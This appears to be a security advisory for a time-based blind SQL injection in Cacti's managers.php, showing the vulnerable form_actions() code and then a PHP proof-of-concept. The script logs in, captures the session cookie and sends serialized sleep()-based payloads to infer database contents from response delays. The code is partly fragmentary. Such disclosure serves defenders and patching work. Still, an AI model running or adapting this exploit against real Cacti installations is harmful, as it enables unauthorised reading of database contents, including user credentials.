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Created October 27, 2023 03:24
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Affected versions
Patched versions
A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information.
SQL Injection vulnerability discovered in managers.php. In function form_actions(), request_var 'selected_items' is joined into into SQL statements without security checks.
source code:
function form_actions() {
global $manager_actions, $manager_notification_actions;
if (isset_request_var('selected_items')) {
if (isset_request_var('action_receivers')) {
$selected_items = cacti_unserialize(stripslashes(get_nfilter_request_var('selected_graphs_array')));
if ($selected_items != false) {
if (get_nfilter_request_var('drp_action') == '1') { // delete
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',' ,$selected_items) . ')');
db_execute('DELETE FROM snmpagent_managers_notifications WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
db_execute('DELETE FROM snmpagent_notifications_log WHERE manager_id IN (' . implode(',' ,$selected_items) . ')');
} elseif (get_nfilter_request_var('drp_action') == '2') { // enable
db_execute("UPDATE snmpagent_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected_items) . ')');
} elseif (get_nfilter_request_var('drp_action') == '3') { // disable
db_execute("UPDATE snmpagent_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected_items) . ')');
header('Location: managers.php?header=false');
$url = ["http://localhost/cacti/", "",];
$url = $url[1];
$username = 'admin';
$password = 'password';
$login = "index.php?action=login&login_username=$username&login_password=$password";
$injectSQLcode1=serialize(["1 ) or if ('admin' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$injectSQLcode2=serialize(["1 ) or if ('error' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$target = "managers.php?action=actions&selected_items=1&action_receivers=1&drp_action=1&selected_graphs_array=";
function curlPage($url, $cookie=false){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($curl, CURLOPT_TIMEOUT, 60);
curl_setopt($curl, CURLOPT_COOKIE,$cookie);
$data = curl_exec($curl);
echo "[++Debug++] ".$url."\n";
return $data;
function getSQLinjectionPage(){
global $url, $login, $target, $injectSQLcode1, $injectSQLcode2;
$data1 = curlPage($url.$login);
//echo $data1."\n";
//get cookie
$cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32);
echo '[++Debug++] Cacti Cookie: '.$cookie."\n";
//check login
$data2 = curlPage($url."index.php", $cookie);
//echo substr($data2, 0, 300)."\n\n";
//time of correct test
$time1 = time();
$data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie);
$time1 = time() - $time1;
echo "[++result++] time of correct test: ".$time1."\n\n";
//time of error test
$time2 = time();
$data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie);
$time2 = time() - $time2;
echo "[++result++] time of error test: ".$time2."\n\n";
if( $time2 <=1 and $time1 >= 5){
echo "[++result++] Time difference exist, vulnerability exsit!"."\n\n";
echo "[++result++] No time difference, vulnerability not exsit"."\n\n";
//set ip, port, username, password, InjectCode first
Although there is no echo,by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.
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